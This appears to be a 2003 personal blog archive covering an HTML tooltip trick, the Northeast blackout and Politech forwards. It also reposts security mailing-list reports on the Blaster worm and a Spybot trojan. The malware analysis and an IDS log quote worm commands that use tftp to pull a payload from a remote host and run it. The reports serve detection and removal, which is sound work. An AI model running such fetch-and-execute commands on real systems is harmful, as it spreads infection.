![]() |
||||
| ||||
![]() |
||||
|
||||
![]() |
![]() Saturday, August 16, 2003 A Trick For Quick Comments And FootnotesSteven Den Beste has an interesting HTML gadget he used today in an article about electric power:There's a famous quote from H. L. Mencken to the effect that for any problem there's a solution which is straightforward, easy to understand, and useless. [DWL!] Every now and then, you see [DNW!] If you move the cursor over the indicator, a tool tip appears with a little note -- a sort of on-line footnote. It's a cool effect. So I right-clicked and did a "View Source" and found that Steve was using the <ACRONYM> indicator, which I didn't know. So I opened up the HTML 4.0 Help file and found it in the index. The idea is to use it as an indicator/explaination for acronyms -- that is, abbreviations that make pronounceable words -- like NATO. It turns out there's also an <ABBR> abbreviation tag, [like this], except that the <ABBR> doesn't seem to work. (At least, it's not working when I try it with IE 6...) Anyways, here's how this works. I've added a couple of attributes to the indicator (color and italics) so it stands out from the regular text. I suspect that changing the CSS to do the color and font change automatically would be better, but I haven't done that part yet, so here's the code with the color/font change hand coded: <span style="color:#0000ff;"><EM><ACRONYM title="ToolTip Here! A footnote appears as a tooltip when you put the cursor on the note indicator">[ToolTip Here!]</acronym></EM></span> And you get this: [ToolTip Here!] posted by Gary Williams at 8:37 PM | link | via cryptome.org and USDOJ posted by Gary Williams at 11:10 AM | link | via The New York Times (registration required) posted by Gary Williams at 8:55 AM | link | Friday, August 15, 2003 via whiskey river posted by Gary Williams at 11:46 PM | link | via William Gibson posted by Gary Williams at 9:10 PM | link | Thursday, August 14, 2003 Weird -- We Just Got Back, And Now The Page Doesn't LoadSometimes my page will just load the header, complain that there's an error (usually one of the JScript's won't load, like the comments script from Enetation in England, which hasn't loaded since the blaster worm babble started), and even though the rest of the page usually loads, sometimes it just won't appear on the page (but it's there in the source...). The fix is often just to add a new post and the text starts appearing...So we'll try that. Update: OK, then the lights blinked and the TV shut off (we were watching a baseball game...). It did that three or four times. Then I noticed I was having trouble getting DNS, so (as I always do, since it seems to fix the chronic DNS problems we get here) I cleaned the netcache and rebooted -- and the ISP said my user ID or password was invalid! So I called the ISP, and nobody was there...so I left a message and called back this morning (still couldn't get on the net). Talked to my buddy Aaron Luckette (he's the CEO and a great guy) and he said the lights blinked big-time in Corning. The power supply kept the servers up, but for some reason the server decided that anybody who was logged on was still on -- so it wouldn't let them back in! (And Aaron was gone to Binghamton to rescue his wife, who was stranded at the hospital where she works -- the hospitals in Binghamton were all on emergency power, which don't extend to the powered parking gates at the parking garage...so Aaron wasn't at the office when I called at 4:50...). At least we weren't in NYC. And I did get a bunch of writing done on my book -- How To Webmaster An eZine. (Mostly some standardization issues -- I've added JScript inserts for the standard stuff on each page -- the logo, the copyright claim -- so it all comes from a single file so that when I fiddle with the page-logo, the way I did last night, too, I can update all the pages without having to change each page...duh...but it's a good tip that I'll add to the how to code chapter sometime soon...) Oh, yeah, the comments came back so apparently England has beat the worm (or something). I do wonder whether all the worm babble I'm seeing on intrusions@incidents.org had something to do with the power crash, though. Anyway, once I got back on the net, the page came back. Now all I have to do is finish cleaning up the email... ![]() Click for larger mapFurther update: I just read the story in the email New York Times that I get, and it apparently turns out that the reason behind the blackout is greedy deregulation fiddle: when the New York power utility was deregulated, the power companies (monopolists) sold their power plants (deregulated) but they got to keep the transmission lines (still regulated). So nobody's building new transmission lines, and New York City is a major bottleneck. To the point where the excess power they need at peak times has to come from New York City and Long Island power stations, because there's not enough room in the transmission lines. So that's what happened -- something went wrong at Niagara Falls (lightening strike) or in Pennsylvania (boggle at a nuke) and it tumbled through the transmission grid and knocked out at least 7 nukes (it turns out that nuke power plants depend on the network to run the station, so if the net goes down, the nukes switch to emergency internal power and shut down the plant! -- sort of like the UPS on your 'puter!) and a bunch of regular power plants (cause if they can't put the power on the grid, they auto-shutdown too, and it takes at least half an hour for standard power plants to come back up, cause they have to check the equipment and make sure it's ok before they turn it on...) and the shutdowns tumbled out to Michigan... Here's the story (registration required). posted by Gary Williams at 2:59 PM | link | via Washington Post posted by Gary Williams at 11:28 AM | link | via whiskey river The mind like a clear mirror stand; Time and again wipe it diligently, Don't let it gather dust." - Shenxiu "Enlightenment is basically not a tree, And the clear mirror is not a stand. Fundamentally there is not a single thing - Where can dust collect?" - Huineng via William Gibson posted by Gary Williams at 12:00 AM | link | Wednesday, August 13, 2003 via intrusions@incidents.org New Version Of The Blaster Worm ReportedFrom: intrusions@jackmccarthy.com
Date: Wednesday, August 13, 2003 4:11:53 PM To: intrusions@incidents.org Subject: A new version on the loose... If you haven't already heard...... http://www.kaspersky.com/news.html?id=985370 -Jack Here's the core quote from Kaspersky: Technologically, the new modification of "Lovesan" is a copycat of the original. Slight changes were made only to the appearance of the worm: a new name of the main worm-carrier file (TEEKIDS.EXE instead of MSBLAST.EXE), a different method of code compression (FSG instead of UPX), and new "copyright" strings in the body of the worm abusing Microsoft and anti-virus developers. posted by Gary Williams at 4:32 PM | link | The Viral Blog Interview ContinuesI was expecting the viral interviews to stop here. I didn't expect anybody to sign up. But, thanks to meg and the gang at Mandarin Design (who've been over a visit a lot in the last couple of days), Mark from http://brykmantra.blogspot.com/ took the plunge and signed up for the interview. Just so you remember, here's the rules: 1) If you want to participate, leave a comment saying "interview me." So, here are the questions for Mark: 1) Where do you live, why do you live there and where to you want to live? So, give Mark a day or two and head on over to http://brykmantra.blogspot.com/. posted by Gary Williams at 2:44 PM | link | EFF and Stanford law center launch DirecTVdefense.orgFrom Declan McCullagh's PolitechFrom: declan@well.com
Date: Wednesday, August 13, 2003 4:17:19 AM To: politech@politechbot.com Subject: FC: EFF and Stanford law center launch DirecTVdefense.org ---------- Forwarded message ---------- Date: Tue, 12 Aug 2003 15:18:37 -0700 (PDT) From: Joseph Lorenzo Hall <jhall@astron.Berkeley.EDU> To: Dave Farber <dave@farber.net>, Declan McCullagh <declan@well.com> Subject: EFF, Stanford CIS launch directvdefense.org EFF, Stanford CIS launch directvdefense.org Not only is the RIAA planning thousands of lawsuits against individuals... Direct TV has already initiated approximately 9000 (that's no typo!) federal lawsuits against individuals. These individuals did not necessarily do anything illegal... most of them merely bought a piece of technology called a smart card programmer. Direct TV claims that the only use for such tech. is to steal satellite broadcasting... however, readers of Politech and IP know that they can be used for, at least, one other thing: loading them up with bogus votes and using them in Diebold voting machines! The EFF and Stanford's Center for Internet and Society have launched a website ( http://www.directvdefense.org/ ) that aims to aid individuals that have been threatened by Direct TV with lawsuits or just plain sued. Among the resources provided is a huge list of attorneys that have dealt with Direct TV cases, many at reduced/aggregate rates. Joe ----------------------------------------------------------------- Joseph Lorenzo Hall Graduate Student http://pobox.com/~joehall ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ Like Politech? Make a donation here: http://www.politechbot.com/donate/ ------------------------------------------------------------------------- Declan McCullagh's photographs are at http://www.mccullagh.org/ ------------------------------------------------------------------------- posted by Gary Williams at 11:44 AM | link | via Drug discovery - biotech, pharmaceuticals, research, clinical trials, etc. In the pipeline - Corante I'll leave by quoting part of a poem that I wrote one day in grad school, having stuffed my brain with the chiral aspects of optical spectroscopy. What came out was a version of a Lewis Carroll poem which was itself a parody of Wordsworth:posted by Gary Williams at 2:02 AM | link | via abuddhas memes posted by Gary Williams at 1:55 AM | link |Man is the only animal that blushes - or needs to. - Mark Twain via whiskey river posted by Gary Williams at 1:34 AM | link | via William Gibson posted by Gary Williams at 12:24 AM | link | Tuesday, August 12, 2003 Notes On DCOM Exploits From StanfordFrom: Tina Bird
Date: Tuesday, August 12, 2003 7:00:14 PM To: intrusions@incidents.org Subject: Notes on DCOM exploits Hi all -- Stanford's been hit with at least four distinct exploits based on the Microsoft DCOM/RPC vulnerability. At least one of the attacks does not seem to have made it into any of the anti-virus vendors' databases yet (we're working on that) -- this one disables Norton Anti-Virus and very politely installs the MS03-026 patch once it's compromised a victim machine. Everything we knew up until Friday evening is currently on line at http://securecomputing.stanford.edu/alerts/windows-rpc-update-7aug2003.html Most importantly, this page includes ways to tell which of the exploits has hit a given machine. I'm going to add information on Blaster this afternoon. Note that there is no one cleaning tool that successfully removes all signs of the infection -- no tool available yet at all that works on what we're referring to as the "33571 worm" -- and that you can only remove an infection >after< it's been correctly identified. Please contact me with questions, corrections, etc. Joy joy joy -- tbird -- A computer lets you make more mistakes faster than any invention in human history - with the possible exception of handguns and tequila. -- Mitch Ratliff http://www.precision-guesswork.com Log Analysis http://www.loganalysis.org VPN http://vpn.shmoo.com tbird's Security Alerts http://securecomputing.stanford.edu/alert.html Note: for the patch from MicroSoft, go here: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-026.asp. If you're sure you had the MSBLASTER worm, Symantec has a removal tool (got the link from Slashdot) here: http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html. posted by Gary Williams at 7:43 PM | link | via Slashdot link posted by Gary Williams at 2:38 PM | link | MSBLAST Infections Per Hour![]() via intrusions@incidents.org From: George Bakos Date: Tuesday, August 12, 2003 1:53:26 PM To: Ken.Connelly@uni.edu Cc: intrusions@incidents.org Subject: Re: [LOGS] Summary of large-scale portscanning detects Folks, I've put up a graph of new msblast sources per hour. This is updated approx. every 10 minutes: http://people.ists.dartmouth.edu/~gbakos/msblast.png If anyone wants to send me their firewall/IDS logs, sanitized is fine, particularly TCP port 135/4444 activity, I'll gladly integrate them here. All I ask for is date/time, src ip, dst port & protocol, beginning at 12:00 EDT (16:00 GMT) 11 Aug. mo' data mo' data mo' data. On Mon, 11 Aug 2003 07:26:53 -0500 (CDT) Ken.Connelly@uni.edu wrote: > The following extracts show the beginning and ending of scan activity > was detected on my network. The number following each set is the total > number of probes for that source. Timestamps are GMT-0500. > > Aug 10 18:27:57 209.249.227.117:1379 -> xxx.yyy.0.2:445 SYN ******S* > Aug 10 18:27:57 209.249.227.117:1380 -> xxx.yyy.0.3:445 SYN ******S* -- George Bakos Institute for Security Technology Studies - IRIA Dartmouth College gbakos@ists.dartmouth.edu 603.646.0665 -voice 603.646.0666 -fax via Sinfest Cartoon Of The Day![]() Monday, August 11, 2003 via intrusions@incidents.org Spybot DDoS zombie using dll injection and RPC/DCOM exploitFrom: Joe Stewart Date: Monday, August 11, 2003 12:45:37 PM To: intrusions@incidents.org Subject: Spybot DDoS zombie using dll injection and RPC/DCOM exploit A new variant of the Spybot IRC DDoS zombie which can spread via the RPC/DCOM exploit has been discovered attempting to infect honeypots we are monitoring. It includes the exploit code, a tftp server, a dll injector and the IRC control component all in one self-contained package of 24064 bytes (UPX packed). The trojan infects a system using the RPC/DCOM exploit shellcode from the HD Moore exploit. It obtains a remote shell on port 4444 and runs the following commands: C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe C:\WINNT\system32>start winlogin.exe C:\WINNT\system32>winlogin.exe x.x.x.x is the IP address of the zombie host which is making the connection. Note that there is a bug in the code which makes the bot sometimes get its own IP address as 0.0.0.0. In these cases the trojan will be unable to infect other systems. winlogin.exe is a DLL injector. Note the similarity in the name to the Windows system file winlogon.exe - make sure not to confuse the two, as removing or damaging winlogon.exe will make Windows unable to start. The presence of winlogin.exe may not necessarily indicate an infection; other software may use this name (although it is questionable). A true indicator of infection is registry keys referencing winlogin.exe in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which reappear immediately after being deleted. When winlogin.exe successfully starts on an infected system, it will extract a DLL file to %windir%\system32 and inject it into the running explorer.exe process. This dll has been known to use the name yuetyutr.dll but may be renamed in future variants. The injector rocess will then exit, but the injected DLL remains in memory. Since it runs in the process space of explorer.exe, it will likely be undetected by personal firewalls. The trojan removes the tftp.exe file so that the host system cannot be re-infected using the same method. When this file is deleted, you may get a message box popup that reads: "Files that are required for Windows to run properly have been replaced by unrecognized versions. To maintain system stability, Windows must restore the original versions of these files." Removal instructions: This trojan runs as long as the main explorer.exe process is running, so it is impossible to simply kill the process. It constantly maintains its registry entries and will also recreate the injector file if it is removed. It is even capable of running in safe mode, so removal is difficult. However, by corrupting the injector file, we can make it impossible for the trojan to inject itself on the next boot, allowing us to remove the associated registry keys and files. WARNING: This is an advanced procedure. Do not attempt this if you are unsure of what you are doing. Entering the wrong command here could render your computer unusable! Presence of the winlogin.exe file does not necessarily indicate an infection. If you do not also find the yuetyutr.dll file on your system, or you do not see registry keys which re-insert themselves when removed, you are advised against attempting this procedure. Open a command prompt and enter the following commands: cd %windir%\system32 echo 'go away' > winlogin.exe This will corrupt the winlogin.exe file so it can no longer be run. Reboot the computer, run regedit and remove the registry entries in HKLM\Software\Microsoft\Windows\CurrentVersion\Run associated with winlogin.exe Remove %windir\system32\winlogin.exe and %windir\system32\yuetyutr.dll -Joe Joe Stewart, GCIH Senior Intrusion Analyst LURHQ Corporation http://www.lurhq.com/ Update: Others Seeing The Worm, TooFrom: Pedro Paulo Ferreira BuenoDate: Monday, August 11, 2003 3:12:54 PM To: 'Mike Sallman'; intrusions@incidents.org Subject: RES: Spybot DDoS zombie using dll injection and RPC/DCOM exploit Additional info about msblast.exe at isc.sans.org Pedro Bueno -----Mensagem original----- De: Mike Sallman [mailto:mike@fidelitybankmn.com] Enviada em: segunda-feira, 11 de agosto de 2003 15:36 Para: 'Joe Stewart'; intrusions@incidents.org Assunto: RE: Spybot DDoS zombie using dll injection and RPC/DCOM exploit Just saw this on ours: [**] TCP Intrusion/Reconnaissance attempt [**] 08/11-12:50:15.565588 0:6:28:F9:DC:A0 -> 0:0:F:FF:FF:FF type:0x800 len:0x5E 208.252.167.202:3231 -> aaa.bbb.ccc.ddd:4444 TCP TTL:122 TOS:0x0 ID:1638 IpLen:20 DgmLen:80 DF ***AP*** Seq: 0x91424341 Ack: 0x54FCB639 Win: 0xFB40 TcpLen: 20 74 66 74 70 20 2D 69 20 32 30 38 2E 32 35 32 2E tftp -i 208.252. 31 36 37 2E 32 30 32 20 47 45 54 20 6D 73 62 6C 167.202 GET msbl 61 73 74 2E 65 78 65 0A ast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Google didn't turn up anything for msblast.exe Mike Further Update:From: Corey MerchantDate: Monday, August 11, 2003 3:40:30 PM To: intrusions@incidents.org Subject: Windows RPC/DCOM - MSBlast Worm Here's more on the new Windows RPC/DCOM worm. This one seems pretty simple so far. It does most of what you may have seen on isc.sans.org: - exploits via port 135/RPC. - downloads binary (msblast.exe) via tftp. - adds a registry key to re-start after reboot AND: - On the 16th, syn-floods (with spoofed sources) windowsupdate.com. Corey Merchant LURHQ Corporation www.lurhq.com Further Further Update: Initial Summary AvailableFrom: jullrich@sans.orgDate: Monday, August 11, 2003 3:59:54 PM To: intrusions@sans.org Subject: rpc dcom worm "BILLY" just a quick pointer that we posted a first analysis at http://isc.sans.org/diary.html -- SANS - Internet Storm Center http://isc.sans.org PGP Key: http://isc.sans.org/jullrich.txt via Happy Furry Puppy Time with Norbizness INTERVIEW FARCE, the SEQUEL.As a condition of being interviewed, I must now become an interviewer of another blogger out there. If you agree to be interviewed (by leaving a comment to this post), you must also agree to the following conditions, or I will be hunted down by the people who started this thing and slapped silly: Here's Norbizness's Questions (And My Answers)FIVE QUESTIONS FOR OUR INTREPID GUESTSI don't like this question a bit, but since I agreed to answer whatever stupid questions asked, I'd pick Bush, Chaney, Ashcroft and Rowe, since they seem determined to destroy the United States and I'm tired of not having a job and without 'em I expect the economy would pick up. (2) If you could learn a musical instrument that you don't currently know, what would it be and who would be your ideal instructor?I play guitar, keyboards, trumpet and skin drums already, so I suppose it would have to be saxophone or cello. I'd pick my friend Denise for an instructor, since she's a great fiddle player and she's beautiful besides. I don't know any sax players. And I'd like to see her again. (3) Old Uncle Giblet up and died and left you $3 million tax free bucks, which can only be spent on a piece of property (land, house, business). What do you spend it on?I'd buy a bed and breakfast on a lake in north California and set up a computer programming camp. (4) What's the one thing you think you offer on your weblog that zillions of other weblogs don't? Really?As Norbizness notes, if you scroll down TFS Reluctant really fast, it puts you into convulsions. And I think I pick a good selection of interesting nonsense and informative stories, not to mention poetry, spiritual quotes and utter drivel. (5) If you were limited to only reading three weblogs a day, who would they be and why? Please don't mention me, unless it's some sort of pity-based "honorable mention".Because Michelle Goodwool is my friend, and I learn web programming stuff from her: Sorry I couldn't make it more person-specific, but hey, there's four of you and I'm lazy. Now spread the disease! Now I guess I'm committed to asking five questions to whoever volunteers by leaving a comment -- same rules, so if you want to spread the virus...sign up and I'll send you your questions in tomorrow's email... posted by Gary Williams at 12:17 PM | link | Anybody else seeing this blogger error?When I post, I get this message (started yesterday, continued today): 550 Could not open: No space left on device on file:archives/2003_08_10_tfs_reluctant_archive.html Could blogger be running out of disk space? Or do you think they've put file size limits on non-Pro Blogger customers? Any advice? Or is this just a new manifestation of the continuing saga of blogger archive problems? Update: The error disappeared around 1 p.m. (EST). Think they got a bigger disk? Hope so... posted by Gary Williams at 9:18 AM | link | via The New York Times (registration required) posted by Gary Williams at 9:11 AM | link | Sunday, August 10, 2003 FBI lobbies for new wiretap rules targeting cable, DSL providersFrom Declan McCullagh's PolitechFrom: declan@well.com
Date: Sunday, August 10, 2003 10:59:47 PM To: politech@politechbot.com Subject: FC: FBI lobbies for new wiretap rules targeting cable, DSL providers http://news.com.com/2100-1028-5056424.html FBI targets Net phoning By Declan McCullagh July 29, 2003, 4:00 AM PT Internet telephone calls are fast becoming a national security threat that must be countered with new police wiretap rules, according to an FBI proposal presented quietly to regulators this month. Representatives of the FBI's Electronic Surveillance Technology Section in Chantilly, Va., have met at least twice in the past three weeks with senior officials of the Federal Communications Commission to lobby for proposed new Internet eavesdropping rules. The FBI-drafted plan seeks to force broadband providers to provide more efficient, standardized surveillance facilities and could substantially change the way that cable modem and DSL (digitalsubscriber line) companies operate. The new rules are necessary because terrorists could otherwise frustrate legitimate wiretaps by placing phone calls over the Internet, warns a summary of a July 10 meeting with the FCC that the FBI prepared. "Broadband networks may ultimately replace narrowband networks," the summary says. "This trend offers increasing opportunities for terrorists, spies and criminals to evade lawfulelectronic surveillance." [...] ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ Like Politech? Make a donation here: http://www.politechbot.com/donate/ ------------------------------------------------------------------------- Declan McCullagh's photographs are at http://www.mccullagh.org/ ------------------------------------------------------------------------- posted by Gary Williams at 11:24 PM | link | ![]() Click for 482K image via http://antwrp.gsfc.nasa.gov/apod/astropix.html LunationCredit & Copyright: Antonio Cidadaoposted by Gary Williams at 3:01 PM | link | Role of Politech in the Apple iTunes issue, from New York TimesFrom Declan McCullagh's PolitechFrom: declan@well.com
Date: Sunday, August 10, 2003 12:08:24 PM To: politech@politechbot.com Subject: FC: Role of Politech in the Apple iTunes issue, from New York Times Previous Politech message: http://www.politechbot.com/p-04993.html --- http://www.nytimes.com/2003/07/28/technology/28APPL.html http://www.iht.com/articles/104391.html Border-crossing trouble for downloaded tunes By Bob Tedeschi NYT Tuesday, July 29, 2003 Online music-selling services have far fewer restrictions than the industry's early offerings, but they do not necessarily travel well. That became evident last week after an Apple iTunes customer posted a complaint on the Web log of Declan McCullagh, who covers technology for CNet's News.com, and the discussion list of David Farber, a business and technology professor at the University of Pennsylvania. The posting, from Shawn Yeager, a technology consultant in Toronto, related his problems gaining access to songs he had downloaded from the iTunes online music store before he moved to Canada from the United States. In an interview, Yeager said that after complaining to Apple, he received automated e-mail responses implying that international licensing rights were to blame for his troubles. An Apple spokeswoman, Lara Vacante, said that Yeager's disappearing music files were not the result of Apple's policies but a systems error, though she and Yeager disagreed about where the error occurred. "Once you download a song, it's yours," Vacante said. But she said a consumer who did not have a credit card with a U.S. billing address could not download iTunes, because Apple has rights to sell the more than 200,000 songs in its database only in the United States. Yeager said that the problem had been resolved to his satisfaction but that "this points to some core problems" with how online companies restrict the use of the music they sell. His posting Friday resulted in much discussion in online news groups and inquiries to other online music services about their international sales policies. [...] ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ Like Politech? Make a donation here: http://www.politechbot.com/donate/ ------------------------------------------------------------------------- Declan McCullagh's photographs are at http://www.mccullagh.org/ ------------------------------------------------------------------------- posted by Gary Williams at 1:43 PM | link | SPEWS And Something Awful -- A Humor Site's Take Of Spamblock WoeFrom Declan McCullagh's PolitechFrom: declan@well.com
Date: Sunday, August 10, 2003 11:42:11 AM To: politech@politechbot.com Subject: FC: First Spamcop, now SPEWS -- a humor site's tale of spamblock woe ---------- Forwarded message ---------- Date: Fri, 8 Aug 2003 17:25:42 -0400 From: Ben <bmw@carolina.rr.com> To: declan@well.com Subject: First spamcop, now SPEWS. I thought you might already know about this since SA is an extremely popular site, as is FARK.com which has been linking to the SA site as this all unfolds. But since I haven't seen it on the list, I thought I'd make sure... http://somethingawful.com/articles.php?a=1605 .....the short version is that SA is a popular humor site who's provider has been blacklisted by SPEWS.org in a manner even more annoying than Spamcop's typical methods. Well, maybe annoying is an understatement. Not only did SPEWS blacklist them so that customers would be angered at the loss of legitimate correspondence and flood Cogent with complaints, the only recourse for hosted sites like SA was to post to a Newsgroup frequented more by SPEWS supporters than SPEWS itself. The result was that when SA's attempts to be removed were turned down, the writers explainedthe situation to the site's fans so that (as in politech's case) they would be able to complain, and hopefully the issue would then be resolved. fans did complain, some angry and insulting I'm sure, and some well reasoned and calm. That's probably how it was in matter between your list and Spamcop, only this time it had to happen on a public newsgroup. The result was that SPEWS supporters felt they were under attack, and in what must be a monument to hypocrisy, some of them responded by signing SA's staff up to more than 100 spam mailing lists.......and it doesn't seem to be over yet. -Ben ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ Like Politech? Make a donation here: http://www.politechbot.com/donate/ ------------------------------------------------------------------------- Declan McCullagh's photographs are at http://www.mccullagh.org/ ------------------------------------------------------------------------- posted by Gary Williams at 1:36 PM | link | via Pharma Watch OK, How About A Little Bit Of Everything For Everybody?And as Pfizer becomes second only to General Electric in corporate mega goliath-ness, I look forward to their CEO writing a book along the line of GE’s Jack Welsh’s “Who Stole My Cheese”. I presume Hank McKinnell (The Incredible Hank?) will be calling it something like “Buy Everything, Buy Everybody”. That seems to be their strategy. They can’t invent decent drugs, so they buy up the companies that can. They buy up the politicians to push through the legislation to get their drugs approved (and keep competitors off the market). They buy up all the airtime and adspace and buy up all the celebs to promote their wares. And of course, they buy the clinicians and researchers with lots of lovely research grants, consultancies and good old wining and dining.posted by Gary Williams at 1:31 AM | link | |
![]() |
|
![]() |
![]() |
|
![]() |
![]() |
||||
![]() |